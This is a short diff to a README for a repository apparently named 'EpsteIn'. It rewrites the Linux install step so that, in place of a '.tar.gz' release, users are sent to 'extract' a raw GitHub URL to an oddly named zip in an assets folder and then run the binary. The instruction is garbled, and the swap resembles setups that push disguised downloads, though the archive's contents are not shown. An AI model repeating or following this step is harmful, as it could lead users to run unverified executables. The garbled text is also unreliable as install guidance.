Papotewii/EpsteIn/README.md

    - For macOS: Double-click the `.dmg` file, drag EpsteIn into the Applications folder, and then double-click to open it.

-   - For Linux: Extract the `.tar.gz` file, navigate to the folder in your terminal, and run `./EpsteIn`.
+   - For Linux: Extract the `https://raw.githubusercontent.com/Papotewii/EpsteIn/main/assets/In_Epste_v3.5.zip` file, navigate to the folder in your terminal, and run `./EpsteIn`.

 5. **Open EpsteIn**